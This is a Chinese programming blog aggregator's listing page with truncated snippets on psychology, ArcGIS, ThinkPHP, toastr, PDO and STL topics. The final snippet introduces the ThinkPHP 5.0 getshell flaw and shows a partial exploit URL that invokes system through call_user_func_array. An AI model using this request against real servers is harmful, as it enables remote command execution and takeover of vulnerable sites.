一、绪论 1、什么是心理学? 心理学:研究人的心理现象及规律的学科 人的活动总是有一定的目的,为了实现目的人组织和调节自己的行为,克服困难。人有着自己的需要和愿望、信念和理想。每个人的能力不同,气质迥异,性格独特。这些属于心理现象,构成了心理学研究的对象。 2、个体心理(心理动机、心理过程、心理特性 ...
分类:
其他好文 时间:
2019-02-05 19:39:39
阅读次数:
295
ArcGIS自定义工具箱-清空工作空间 联系方式:谢老师,135-4855-4328,xiexiaokui#qq.com 目的:删除工作空间里的要素类,栅格和独立表 使用方法: 例如"C:\Users\think\Documents\ArcGIS\Default.gdb" 结果: ...
分类:
其他好文 时间:
2019-01-30 23:10:08
阅读次数:
165
1 控制器(application/home/controller/Home.php) namespace app\home\controller;use think\Controller;use think\Db; class Home extends Controller{ public fun ...
分类:
Web程序 时间:
2019-01-30 12:58:55
阅读次数:
465
library目录 Think目录 mvc ...
分类:
Web程序 时间:
2019-01-29 14:58:39
阅读次数:
238
Now I think you have got an AC in Ignatius.L's "Max Sum" problem. To be a brave ACMer, we always challenge ourselves to more difficult problems. Now y ...
分类:
其他好文 时间:
2019-01-28 23:50:49
阅读次数:
200
/显示一个警告,没有标题 toastr.warning('My name is Inigo Montoya. You killed my father, prepare to die!') 显示一个成功,标题 toastr.success('Have fun storming the castle! ...
分类:
其他好文 时间:
2019-01-27 19:21:58
阅读次数:
202
1.Koa 2.express 3.thinkJs ...
分类:
其他好文 时间:
2019-01-25 17:47:34
阅读次数:
145
第一个问题: PDO not found 是因为 php没有安装pdo扩展, 无法提供给 php 以 数据库访问功能, 所以 报错是在文件: Think/Db.class.php的里面. 解决方法是: 给 php安装 PDO 扩展: 这时 再看 就可以 在 默认 自动 加载的modules目录 中 ...
分类:
数据库 时间:
2019-01-24 00:24:51
阅读次数:
263
reverse() A canonical algorithm using this iterator is the STL reverse() algorithm: This algorithm reverses the elements in the specified iterator ran ...
分类:
编程语言 时间:
2019-01-23 12:31:46
阅读次数:
113
一、thinkPHP5.0爆出getshell漏洞 http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= ...
分类:
Web程序 时间:
2019-01-19 11:22:57
阅读次数:
254